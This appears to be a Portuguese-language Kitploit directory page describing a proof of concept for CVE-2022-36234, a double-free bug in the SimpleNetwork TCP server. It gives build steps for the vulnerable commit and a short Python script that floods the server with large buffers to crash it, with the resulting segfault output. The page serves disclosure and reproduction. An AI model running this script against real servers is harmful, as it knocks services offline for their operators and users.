Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-36234 — Prova de conceito para CVE-2022-36234 | Kitploit
Ferramentas/GitHubGitHub/halcy0nic/cve-2022-36234
Análise de VulnerabilidadesExploraçãoFuzzingTestes de PenetraçãoAprendizado e EducaçãoExploração de Binários
GitHubhalcy0nic/cve-2022-36234

CVE-2022-36234

Prova de conceito para CVE-2022-36234

Ver Repositório
21há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Descrição do CVE-2022-36234

Foi descoberto que o SimpleNetwork TCP Server no commit 29bc615f0d9910eb2f59aa8dff1f54f0e3af4496 contém uma vulnerabilidade de double free que é explorada por meio de pacotes TCP forjados. Disparar o double free permite que clientes derrubem remotamente qualquer servidor TCP SimpleNetwork. Em outras situações, vulnerabilidades de double free podem causar comportamento indefinido e, potencialmente, execução de código nas circunstâncias certas.

Reprodução

Para garantir que você tenha as ferramentas de compilação padrão necessárias para compilar a biblioteca, instale os seguintes pacotes (na maioria dos sistemas eles já estarão instalados):

root@kitploit:~
sudo apt-get install build-essential git

A vulnerabilidade pode ser reproduzida enviando requisições consecutivas ao servidor, contendo um grande buffer de caracteres em um pacote TCP. Primeiro, compile a biblioteca 'libSimpleNetwork' e o servidor de exemplo fornecidos no código-fonte:

root@kitploit:~
git clone https://github.com/kashimAstro/SimpleNetwork.git
cd SimpleNetwork
git checkout 29bc615f0d9910eb2f59aa8dff1f54f0e3af4496
cd src
make
cd ../example-server
make

Inicie o servidor de exemplo:

root@kitploit:~
./server 80 1

Salve o seguinte script python3 de prova de conceito em um arquivo (modifique o host conforme necessário):

Baixar ferramenta
root@kitploit:~
import socket

host = "localhost"
port = 80                   # The same port as used by the server
buf = b'A'*10000

try:
    for i in range(50):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.sendall(buf)
        data = s.recv(1024)
        s.close()
        print('Received', repr(data))
except:
    print("Completed...")

Execute o script python3:

root@kitploit:~
python3 poc.py

Verificação de crash:

Se for bem-sucedido, o servidor será derrubado e você verá a seguinte saída do aplicativo:

root@kitploit:~
segmentation fault  ./server 80 1

Referências

  • https://owasp.org/www-community/vulnerabilities/Doubly_freeing_memory
  • https://cwe.mitre.org/data/definitions/415.html
  • https://github.com/kashimAstro/SimpleNetwork/issues/22
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36234